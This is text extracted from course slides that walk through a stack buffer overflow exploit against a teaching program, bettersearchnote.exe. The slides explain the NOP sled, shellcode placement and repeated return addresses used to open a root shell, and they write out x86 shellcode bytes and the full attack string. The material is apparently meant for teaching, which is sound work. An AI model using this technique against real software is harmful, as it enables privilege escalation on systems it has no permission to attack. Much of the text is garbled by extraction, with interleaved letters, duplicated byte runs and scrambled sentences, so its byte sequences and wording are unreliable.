Buffer Overflow Walk-Through The Code Change name of notesearch program in our exploit code to match course naming convention bettersearchnote.exe 16 strcpy(command, “./bettersearchnote.exe\’”); Change name of notesearch program in our exploit code to match course name in convention Normally, Jose runs bettersearchnote program to search for notes with keywords of his choosing jose@EC310-VM $ ./ bettersearchnote.exe “Life” Life is Beautiful The exploit program is crafted to run the program on his behalf, using the function “system()” For example system(“ls”) would list the content of the current directory as though it was run from the command line jose@EC310-VM $ ls unix_basics booksrc work desktop ec310code } like this except no one ever enters this at the command prompt The exploit program is crafted to run the program on his behalf, using the function “system()” system_example.c #include… int main() { system(“ls”); } jose@EC310-VM $ ./system_example.exe unix_basics booksrc work desktop ec310code Now, lets look at what the exploit program does… Standard inclusion of C libraries The goal of our exploit program is to open a root shell This is machine language that opens a shell prompt for the user running the program First, the set-up… This is the standard way to start a program and take in command line arguments… But you already knew that Building the stack… These lines declare the variables to be used in the program buffer command Variables are placed on the stack for the main function offset ret ptr i 270 Address Address Integer Integer Address Integer Allocating memory on the heap for our string command, which will be called by the function system() . Allocates 200 bytes on the heap for the string command 0x__ 200 Bytes The address of this location on the heap becomes the value of the pointer command This string will eventually be run with the function system() buffer command offset ret ptr i &command 270 Allocating memory on the heap for our string command, which will be called by the function system(). The bzero function places 200 0x00’s starting at the location to which command points 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 buffer command offset ret ptr i &command 270 200 Bytes Building the String command This copies the string “./bettersearchnote.exe ‘“ into the location pointed to by the pointer command 00 . 00 t 00 s 00 c 00 t 00 x 00 00 00 / 00 t 00 e 00 h 00 e 00 e 00 00 buffer command offset ret ptr i 00 b 00 e 00 a 00 n 00 . 00 00 00 00 e 00 r 00 r 00 o 00 e 00 ‘ 00 00 &command 270 Next This we string need willtoeventually find the address overflow where the bettersearchnote the command linebuffer, arguments have the for program execute bettersearchnote our maliciouswill code, start! and open a shell Take the number of bytes in the current string command, until the null terminator (24 bytes). Add this to the address pointed to by the variable command + and store that address in the pointer buffer. . t s c t x 00 00 / t e h e e 00 00 b e a n . 00 00 e r r o e ‘ 00 00 buffer command &command offset 270 ret ptr i 24 Bytes Specifying our custom return address . t s c t x 00 00 This takes the command line argument to create our own custom offset value, but it is not used. / t e h e e 00 00 b e a n . 00 00 e r r o e ‘ 00 00 buffer &command+24 command &command offset 270 ret ptr i Specifying our custom return address This takes the address of i and subtracts the value of offset. This value is placed in the variable ret , this value represents the address of our desired shell code execution entry point. . t s c t x 00 00 / t e h e e 00 00 b e a n . 00 00 e r r o e ‘ 00 00 buffer &command+24 command &command offset 270 - 270 ret ptr &i i And place enough copies of our custom return address in the buffer to overwrite the original return address. Takes the address contained in ret and places it in the address pointed to by the buffer. This repeats every 4 bytes for 40 iterations. . t s c t x 00 00 00 / t e h e e 00 00 00 b e a n . . 00 00 00 e r r o e ‘ 00 00 00 buffer &command+24 command offset ret ptr &command 270 &i &i-270 - 270 i Now the entire heap looks like this . t s c t x 0x00 0x00 0x00 0x00 / t e h e e b e a n . &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 e r r o e ' 0x00 0x00 0x00 0x00 Next create a buffer of filler commands, called NOPs, to help find the shell code . t s c t x / b e t e r e a r h n o e . e e . ‘ &I - 270 &I - 270 &i - 270 ret 0x I – addr - 270 &i - 270 &i - 270 &i - 270 &i - 270 &i - 270 memset() sets a byte in memory to the value 0x90 specified. In this case it puts the value 0x90 in the address pointed to by the buffer and into the next 59 addresses as well. 0x90 is machine code for “No Operation,” Which literally means do nothing. buffer &command+24 command &command offset 270 ret ptr i &i-270 Now the entire heap looks like this NOP sled . t s c t x 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 / t e h e e 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 b e a n . 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 e r r o e ' 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 Then place our shell code into the buffer immediately following the NOPs . / b e t t e r s e a r c h n o t e . e x e . ‘ 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 ret 0x I – addr - 270 ret 0x I – addr - 270 ret 0x I – addr - 270 ret 0x I – addr - 270 ret 0x I – addr - 270 ret 0x I – addr - 270 Copies the shell code into memory after the NOP sled buffer &command+24 command &command offset 270 ret ptr i &i-270 Now the entire heap looks like this With the newly inserted shell code here . t s c t x 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x31 0x99 0x80 0x51 0x2f 0x2f 0x89 0xe2 0xcd / t e h e e 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xc0 0xb0 0x6a 0x51 0x73 0x62 0xe3 0x53 0x80 b e a n . 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x31 0xa4 0x0b 0x68 0x68 0x69 0x51 0x89 0x80 e r r o e ' 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xc9 0xcd 0x58 0x2f 0x68 0x6e 0x89 0xe1 partial ret 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 Close the string command with a quote so it is ready to be run by the function system() ‘ . t s c t x 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x31 0x99 0x80 0x51 0x2f 0x2f 0x89 0xe2 0xcd // tt ee hh ee ee 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xc0 0xc0 0xb0 0xb0 0x6a 0x6a 0x51 0x51 0x73 0x73 0x62 0x62 0xe3 0xe3 0x53 0x53 0x80 0x80 bb ee aa nn .. 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x31 0x31 0xa4 0xa4 0x0b 0x0b 0x68 0x68 0x68 0x68 0x69 0x69 0x51 0x51 0x89 0x89 0x80 0x80 ee rr rr oo ee '' 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xc9 0xc9 0xcd 0xcd 0x58 0x58 0x2f 0x2f 0x68 0x68 0x6e 0x6e 0x89 0x89 0xe1 0xe1 partial partialret ret 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 Concatenates a single quote at the end of the string command ' 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 Now the string command is finished and ready for execution. jose@EC310-VM $ ./bettersearchnote.exe ‘\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x51\x68\x2f\x2f\x73\x68\x68\x2f \x62\x69\x6e\x89\xe2\x53\x89\xe2\x53\x89\xe1\xcd\x80\x80\x&i-270\x&i-270 \x&i-270\ x&i-270\ x&i-270\ x&i-270 \ x&i-270 \ x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 ’ . t s c t x 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x31 0x99 0x80 0x51 0x2f 0x2f 0x89 0xe2 0xcd / t e h e e 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xc0 0xb0 0x6a 0x51 0x73 0x62 0xe3 0x53 0x80 b e a n . 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x31 0xa4 0x0b 0x68 0x68 0x69 0x51 0x89 0x80 e r r o e ' 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xc9 0xcd 0x58 0x2f 0x68 0x6e 0x89 0xe1 partial ret 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 ‘ 0x00 0x00 0x00 0x00 0x00 0x00 0x00 exploit_notesearch bettersearchnote.exe searchstring fd printing user id sfp return address 100 characters allotted to searchstring by bettersearchnote.exe exploit_notesearch command buffer contains 184 bytes, so it writes 84 bytes beyond the end of searchstring’s allotted space. Ensuring one of our custom return addresses replaces the original return address .. tt ss cc tt xx 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x31 0x31 0x99 0x99 0x80 0x80 0x51 0x51 0x2f 0x2f 0x2f 0x2f 0x89 0x89 0xe2 0xe2 0xcd 0xcd // tt ee hh ee ee 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xc0 0xc0 0xb0 0xb0 0x6a 0x6a 0x51 0x51 0x73 0x73 0x62 0x62 0xe3 0xe3 0x53 0x53 0x80 0x80 bb ee aa nn .. 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x31 0x31 0xa4 0xa4 0x0b 0x0b 0x68 0x68 0x68 0x68 0x69 0x69 0x51 0x51 0x89 0x89 0x80 0x80 ee rr rr oo ee '' 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xc9 0xc9 0xcd 0xcd 0x58 0x58 0x2f 0x2f 0x68 0x68 0x6e 0x6e 0x89 0x89 0xe1 0xe1 partial partial ret ret 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 &i-270 ‘‘ 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00